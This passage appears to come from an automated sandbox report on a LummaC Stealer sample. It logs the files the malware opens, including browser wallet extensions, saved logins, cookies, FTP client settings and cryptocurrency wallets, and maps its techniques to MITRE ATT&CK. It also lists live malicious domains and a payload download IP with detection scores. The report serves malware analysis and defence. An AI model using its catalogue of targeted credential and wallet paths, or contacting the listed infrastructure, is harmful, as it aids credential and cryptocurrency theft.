Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	File opened: C:\Users\user\AppData\Roaming\FTPInfo	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	File opened: C:\Users\user\AppData\Roaming\FTPGetter	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	File opened: C:\Users\user\AppData\Roaming\FTPbox	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	File opened: C:\Users\user\AppData\Roaming\FTPRush	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	File opened: C:\ProgramData\SiteDesigner\3D-FTP	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Directory queried: C:\Users\user\Documents\EFOYFBOLXA	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Directory queried: C:\Users\user\Documents\EFOYFBOLXA	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Directory queried: C:\Users\user\Documents\EWZCVGNOWT	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Directory queried: C:\Users\user\Documents\EWZCVGNOWT	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Directory queried: C:\Users\user\Documents\PWCCAWLGRE	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Directory queried: C:\Users\user\Documents\PWCCAWLGRE	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Directory queried: C:\Users\user\Documents\QCOILOQIKC	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Directory queried: C:\Users\user\Documents\QCOILOQIKC	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Directory queried: C:\Users\user\Documents\ZGGKNSUKOP	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Directory queried: C:\Users\user\Documents\ZGGKNSUKOP	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Directory queried: C:\Users\user\Documents\EFOYFBOLXA	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Directory queried: C:\Users\user\Documents\EFOYFBOLXA	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Directory queried: C:\Users\user\Documents\PWCCAWLGRE	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Directory queried: C:\Users\user\Documents\PWCCAWLGRE	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Directory queried: C:\Users\user\Documents\EFOYFBOLXA	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Directory queried: C:\Users\user\Documents\EFOYFBOLXA	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Directory queried: C:\Users\user\Documents\PIVFAGEAAV	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Directory queried: C:\Users\user\Documents\PIVFAGEAAV	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Directory queried: C:\Users\user\Documents\QCOILOQIKC	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Directory queried: C:\Users\user\Documents\QCOILOQIKC	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Directory queried: C:\Users\user\Documents\SUAVTZKNFL	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Directory queried: C:\Users\user\Documents\SUAVTZKNFL	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Directory queried: C:\Users\user\Documents\EFOYFBOLXA	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Directory queried: C:\Users\user\Documents\EFOYFBOLXA	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Directory queried: C:\Users\user\Documents\QCOILOQIKC	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Directory queried: C:\Users\user\Documents\QCOILOQIKC	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Directory queried: C:\Users\user\Documents\SUAVTZKNFL	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Directory queried: C:\Users\user\Documents\SUAVTZKNFL	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Directory queried: C:\Users\user\Documents\ZGGKNSUKOP	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Directory queried: C:\Users\user\Documents\ZGGKNSUKOP	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Directory queried: C:\Users\user\Documents\PWCCAWLGRE	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Directory queried: C:\Users\user\Documents\PWCCAWLGRE	Jump to behavior

Source: Yara match	File source: 00000003.00000002.1730668845.000000000054A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 628E.tmp.exe PID: 1036, type: MEMORYSTR

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: Process Memory Space: 628E.tmp.exe PID: 1036, type: MEMORYSTR
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Source: C:\Users\user\Desktop\J18zxRjOes.exe	Code function: 0_2_004218CC Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::InternalContextBase::SwitchOut,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::InternalContextBase::SwitchTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,	0_2_004218CC
Source: C:\Users\user\Desktop\J18zxRjOes.exe	Code function: 0_2_00420BF6 Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::GetInternalContext,	0_2_00420BF6
Source: C:\Users\user\Desktop\J18zxRjOes.exe	Code function: 0_2_00651B33 Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::InternalContextBase::SwitchOut,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::InternalContextBase::SwitchTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,	0_2_00651B33
Source: C:\Users\user\Desktop\J18zxRjOes.exe	Code function: 0_2_00650E5D Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::GetInternalContext,	0_2_00650E5D

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	11 Deobfuscate/Decode Files or Information	2 OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	12 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	2 Native API	Boot or Logon Initialization Scripts	11 Process Injection	4 Obfuscated Files or Information	LSASS Memory	12 File and Directory Discovery	Remote Desktop Protocol	41 Data from Local System	21 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 PowerShell	Logon Script (Windows)	Logon Script (Windows)	22 Software Packing	Security Account Manager	44 System Information Discovery	SMB/Windows Admin Shares	1 Screen Capture	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 DLL Side-Loading	NTDS	1 Query Registry	Distributed Component Object Model	3 Clipboard Data	124 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Masquerading	LSA Secrets	131 Security Software Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Virtualization/Sandbox Evasion	Cached Domain Credentials	1 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	11 Process Injection	DCSync	1 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	1 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
J18zxRjOes.exe	47%	ReversingLabs	Win32.Trojan.CrypterX
J18zxRjOes.exe	39%	Virustotal		Browse
J18zxRjOes.exe	100%	Avira	HEUR/AGEN.1306978
J18zxRjOes.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\ScreenUpdateSync[1].exe	100%	Avira	HEUR/AGEN.1306978
C:\Users\user\AppData\Local\Temp\628E.tmp.exe	100%	Avira	HEUR/AGEN.1306978
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\ScreenUpdateSync[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\628E.tmp.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\ScreenUpdateSync[1].exe	39%	ReversingLabs
C:\Users\user\AppData\Local\Temp\628E.tmp.exe	39%	ReversingLabs

Source	Detection	Scanner	Label
http://176.113.115.19/ScreenUpdateSync.exel	0%	Avira URL Cloud	safe
https://post-to-me.com/track_prt.php?sub=0&cc=DEllWB	100%	Avira URL Cloud	malware
http://176.113.115.19/ScreenUpdateSync.exeiA#	0%	Avira URL Cloud	safe
https://cloudewahsj.shop/api	100%	Avira URL Cloud	malware
https://cloudewahsj.shop/apiL	100%	Avira URL Cloud	malware
http://176.113.115.19/ScreenUpdateSync.exe%B	0%	Avira URL Cloud	safe
https://cloudewahsj.shop/apiR	100%	Avira URL Cloud	malware
https://cloudewahsj.shop/	100%	Avira URL Cloud	malware
https://post-to-me.com/track_prt.php?sub=0&cc=DEram	100%	Avira URL Cloud	malware
https://post-to-me.com/track_prt.php?sub=0&cc=DEi	100%	Avira URL Cloud	malware
https://post-to-me.com/track_prt.php?sub=0&cc=DES	100%	Avira URL Cloud	malware
https://cloudewahsj.shop/A	100%	Avira URL Cloud	malware
https://post-to-me.com/u	100%	Avira URL Cloud	malware
https://cloudewahsj.shop/apic	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
post-to-me.com	104.21.56.70	true	false		high
cloudewahsj.shop	104.21.48.1	true	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
rabidcowse.shop	false		high
wholersorie.shop	false		high
https://cloudewahsj.shop/api	true	Avira URL Cloud: malware	unknown
cloudewahsj.shop	false		high
noisycuttej.shop	false		high
nearycrepso.shop	false		high
https://post-to-me.com/track_prt.php?sub=0&cc=DE	false		high
framekgirus.shop	false		high
tirepublicerj.shop	false		high
abruptyopsn.shop	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://post-to-me.com/track_prt.php?sub=&cc=DE	J18zxRjOes.exe, 00000000.00000002.3947908120.0000000000400000.00000040.00000001.01000000.00000003.sdmp	false		high
https://duckduckgo.com/chrome_newtab	628E.tmp.exe, 00000003.00000003.1631558076.0000000002E66000.00000004.00000800.00020000.00000000.sdmp, 628E.tmp.exe, 00000003.00000003.1631473888.0000000002E66000.00000004.00000800.00020000.00000000.sdmp, 628E.tmp.exe, 00000003.00000003.1631411771.0000000002E69000.00000004.00000800.00020000.00000000.sdmp	false		high
http://176.113.115.19/ScreenUpdateSync.exel	J18zxRjOes.exe, 00000000.00000003.1591238252.0000000000756000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/ac/?q=	628E.tmp.exe, 00000003.00000003.1631558076.0000000002E66000.00000004.00000800.00020000.00000000.sdmp, 628E.tmp.exe, 00000003.00000003.1631473888.0000000002E66000.00000004.00000800.00020000.00000000.sdmp, 628E.tmp.exe, 00000003.00000003.1631411771.0000000002E69000.00000004.00000800.00020000.00000000.sdmp	false		high
https://post-to-me.com/track_prt.php?sub=0&cc=DEllWB	J18zxRjOes.exe, 00000000.00000002.3948229777.000000000070D000.00000004.00000020.00020000.00000000.sdmp, J18zxRjOes.exe, 00000000.00000003.3810812443.000000000070C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://cloudewahsj.shop/apiL	628E.tmp.exe, 00000003.00000003.1630071619.00000000004E9000.00000004.00000020.00020000.00000000.sdmp, 628E.tmp.exe, 00000003.00000003.1629782890.00000000004E7000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	628E.tmp.exe, 00000003.00000003.1631558076.0000000002E66000.00000004.00000800.00020000.00000000.sdmp, 628E.tmp.exe, 00000003.00000003.1631473888.0000000002E66000.00000004.00000800.00020000.00000000.sdmp, 628E.tmp.exe, 00000003.00000003.1631411771.0000000002E69000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cloudewahsj.shop/apiR	628E.tmp.exe, 00000003.00000003.1630460444.000000000050A000.00000004.00000020.00020000.00000000.sdmp, 628E.tmp.exe, 00000003.00000003.1629782890.0000000000500000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://176.113.115.19/ScreenUpdateSync.exe%B	J18zxRjOes.exe, 00000000.00000003.3810731766.0000000000789000.00000004.00000020.00020000.00000000.sdmp, J18zxRjOes.exe, 00000000.00000002.3948293292.000000000078C000.00000004.00000020.00020000.00000000.sdmp, J18zxRjOes.exe, 00000000.00000003.1591238252.0000000000756000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	628E.tmp.exe, 00000003.00000003.1631558076.0000000002E66000.00000004.00000800.00020000.00000000.sdmp, 628E.tmp.exe, 00000003.00000003.1631473888.0000000002E66000.00000004.00000800.00020000.00000000.sdmp, 628E.tmp.exe, 00000003.00000003.1631411771.0000000002E69000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.rootca1.amazontrust.com/rootca1.crl0	628E.tmp.exe, 00000003.00000003.1659927938.0000000002ED9000.00000004.00000800.00020000.00000000.sdmp	false		high
http://upx.sf.net	Amcache.hve.7.dr	false		high
